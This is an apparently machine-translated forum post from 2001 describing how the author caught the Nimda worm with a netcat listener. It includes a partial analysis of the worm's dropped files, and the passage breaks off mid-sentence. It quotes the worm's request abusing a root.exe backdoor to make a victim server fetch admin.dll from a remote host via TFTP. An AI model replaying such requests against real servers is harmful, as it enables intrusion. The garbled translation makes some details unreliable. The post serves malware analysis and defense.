Author: tombkeeper2001.9.18 night, I used to open the tcp / 80, with this simple batch program: ------------- cut here ---------- - @ echo off: startnc -vv -w 5 -L -P 80 >> httpd.loggoto start ---------------------------------------------------------------------------------------- ---- usually use it to monitor the distribution of Codexxx, and also expect luck to get a variant. Although it occasionally receives noise of scanning proxy servers, it is generally "RCVD 3818". Suddenly I found some of the IPs for a few hundred-bytes of data, open httpd.log, seeing an HTTP scan, the purpose is to find the root.exe established by Unicode_hole and Coderedii. I didn't care, but in less than 5 minutes, I received a few other scans from different IPs in less than 5 minutes. Is this CodeBlue? I opened a real honeypot, regardless of the Get of the other party responded to "200 ok", and the results immediately saw substantive things: "Get /scripts/root.exe?/c tftp -i xxx.xxx.xxx. XXX get admin.dll http / 1.0 "Good to meet your requirements. Run "tftp -i xxx.xx.xxx.xxx get admin.dll", the result is good to get a good thing, hurry to build a look, then ... @ # $ ...% ^ & ... finally figured out A probably, write a analysis report first. -------------------------------------------------- ------------- Name: Worm.concept.57344 (Nimda / Nima) Name: Nimda / Nima Some anti-virus manufacturers named: Worm.Concept.57344w32 / nimda.a @ mmw32 / nimda @ MMI-WORM.NIMDA Type: Worm / virus affected system: Windows 95, Windows 98, Windows Me, Windows NT 4, Windows 2000 Size: 57344 byte worm: [mmc.exe] appeared The process of Windows folders, worm scans and creation of TFTPD is it. Note that there is also a mmc.exe in the Windows system folder, that is not NIMDA. [Riched20.dll] riched20.dll In addition to appearing in the Windows system folder, it may also appear in any folder with * .doc files. Since it is Winword.exe and WordPad.exe runtime, it is called when the Doc file is turned on, it is equal to running NIMDA. [Admin.dll] (admin In addition to the root of C:, D:, E:) The following "TFTP *****" appears in the "TFTP *****") [load.exe] appears in the Windows system Folder [% temp% / readme * .exe] [TFTP ****] is like TFTP3233. The file location depends on the directory using TFTP. If it is "get /scripts/root.exe/c tftp -i [localip] get admin.dll http / 1.0" then position is "INETPUB / SCRIPTS /".
If it is "get /scripts/..
